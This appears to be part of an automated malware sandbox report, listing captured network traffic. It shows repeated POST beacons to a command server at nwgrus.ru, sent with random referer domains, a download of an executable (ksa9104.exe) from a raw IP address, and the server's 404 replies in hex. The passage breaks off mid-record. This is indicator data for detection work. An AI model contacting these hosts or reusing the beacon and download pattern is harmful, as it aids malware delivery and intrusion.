Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jdrsrpxnderfeln.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 326Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://letknxuqhdcyc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 120Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wkvsglvqmchooeii.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 274Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://liwpdohaxncmk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 124Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://brtyhhcwxjs.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 224Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ndcrdrvnqscc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 262Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bsujsjkqxtjctly.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 207Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://tkcyaumypyw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 259Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://vllrmfxybsdiplqu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 140Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://tamqyjusikafosy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 319Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rtsymdwebcyefo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 210Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://cmpymujrwfied.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 173Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mlfyuywbsduqi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 308Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xasjtfaqoixq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 117Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fedsyouolon.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 278Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lbemhhdwkax.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 359Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://tihslqvhibr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 186Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://vltcfypculmuiq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 156Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://emfnibhwebsi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 267Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://sawtavgcrgnnv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 305Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ttpnojrymdictnko.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 261Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://sdiwjkiticrn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 319Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://uedxkfpodrvnuu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 236Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jmiqpftbbfl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 359Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://eguapsteeivf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 368Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jmyhnxbsgfyxxpwc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 333Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://olbmmmarqkp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 123Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://hhxlvwfcbrqijpck.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 194Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://stpaxqpyogea.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 173Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://hvlkumwrcebxfc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 231Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wuwimcitsicpgplo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 200Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://iqvctgowbce.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 239Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ranxxolmdknfcjg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 273Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mqxuhbjviiy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 264Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gbnguovvbpjawi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 318Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bkopsfqneci.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 290Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ugrocofopkun.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 164Host: nwgrus.ru

Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /ksa9104.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.164

Source: global traffic

DNS traffic detected: DNS query: nwgrus.ru

Source: unknown

HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yilmrbbiqbh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 353Host: nwgrus.ru

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:07:29 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 87 e8 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:07:31 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:07:32 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:07:35 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:07:40 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:07:41 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:07:44 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 18:07:46 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC 